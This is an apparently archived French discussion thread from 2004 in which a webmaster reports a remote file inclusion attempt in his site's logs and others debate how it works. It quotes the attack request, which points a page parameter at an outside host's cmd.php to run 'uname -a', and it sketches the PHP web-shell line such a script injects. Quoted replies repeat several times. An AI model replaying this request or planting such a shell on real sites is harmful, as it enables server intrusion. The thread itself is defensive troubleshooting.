Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire :
http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait
faire quelque chose, mais quoi ?
Le Thu, 26 Feb 2004 13:49:53 +0100, Stanislas Renan a écrit: Mais dis moi, comment tu as fait pour connaître le source du php à l'autre bout toi ?
entre nous, mais ne le répète pas, j'ai tapé l'URL du paramètre dans mon navigateur.
Ou alors tu l'as deviné ?
seulement après avoir lu le résultat de la manip ci-dessus :)
-- Stanislas Renan http://www.volcane.fr/
Christophe PEREZ
Le Thu, 26 Feb 2004 19:46:39 +0100, Stanislas Renan a écrit:
entre nous, mais ne le répète pas, j'ai tapé l'URL du paramètre dans mon navigateur.
Ça ne te donne aucunement le source ça.
Ou alors tu l'as deviné ?
seulement après avoir lu le résultat de la manip ci-dessus :)
Alors en fait, tu n'en sais rien, et tu ne sais pas du tout que ce tente de faire le script après avoir déterminé le uname appelant. C'est tout ce que je voulais savoir.
-- Christophe PEREZ Écrivez moi sans _faute !
Le Thu, 26 Feb 2004 19:46:39 +0100, Stanislas Renan a écrit:
entre nous, mais ne le répète pas, j'ai tapé l'URL du paramètre
dans mon navigateur.
Ça ne te donne aucunement le source ça.
Ou alors tu l'as deviné ?
seulement après avoir lu le résultat de la manip ci-dessus :)
Alors en fait, tu n'en sais rien, et tu ne sais pas du tout que ce tente
de faire le script après avoir déterminé le uname appelant.
C'est tout ce que je voulais savoir.
Le Thu, 26 Feb 2004 19:46:39 +0100, Stanislas Renan a écrit:
entre nous, mais ne le répète pas, j'ai tapé l'URL du paramètre dans mon navigateur.
Ça ne te donne aucunement le source ça.
Ou alors tu l'as deviné ?
seulement après avoir lu le résultat de la manip ci-dessus :)
Alors en fait, tu n'en sais rien, et tu ne sais pas du tout que ce tente de faire le script après avoir déterminé le uname appelant. C'est tout ce que je voulais savoir.
-- Christophe PEREZ Écrivez moi sans _faute !
Thibaut Allender
on 27/02/2004 4:39, Christophe PEREZ wrote :
Ça ne te donne aucunement le source ça.
justement, le but du script est de generer une source, qui pourra etre incluse ensuite la source doit ressembler a un truc du genre print "<? system($cmd) ?>";
Alors en fait, tu n'en sais rien, et tu ne sais pas du tout que ce tente de faire le script après avoir déterminé le uname appelant. C'est tout ce que je voulais savoir.
apres il ne va rien faire... ou s'il le fait, ca sera sur le serveur distant (revoir la notion d'include distant, ca n'a pas l'air clair pour toi...)
justement, le but du script est de generer une source, qui pourra etre
incluse ensuite
la source doit ressembler a un truc du genre print "<? system($cmd) ?>";
Alors en fait, tu n'en sais rien, et tu ne sais pas du tout que ce tente
de faire le script après avoir déterminé le uname appelant.
C'est tout ce que je voulais savoir.
apres il ne va rien faire... ou s'il le fait, ca sera sur le serveur distant
(revoir la notion d'include distant, ca n'a pas l'air clair pour toi...)
justement, le but du script est de generer une source, qui pourra etre incluse ensuite la source doit ressembler a un truc du genre print "<? system($cmd) ?>";
Alors en fait, tu n'en sais rien, et tu ne sais pas du tout que ce tente de faire le script après avoir déterminé le uname appelant. C'est tout ce que je voulais savoir.
apres il ne va rien faire... ou s'il le fait, ca sera sur le serveur distant (revoir la notion d'include distant, ca n'a pas l'air clair pour toi...)
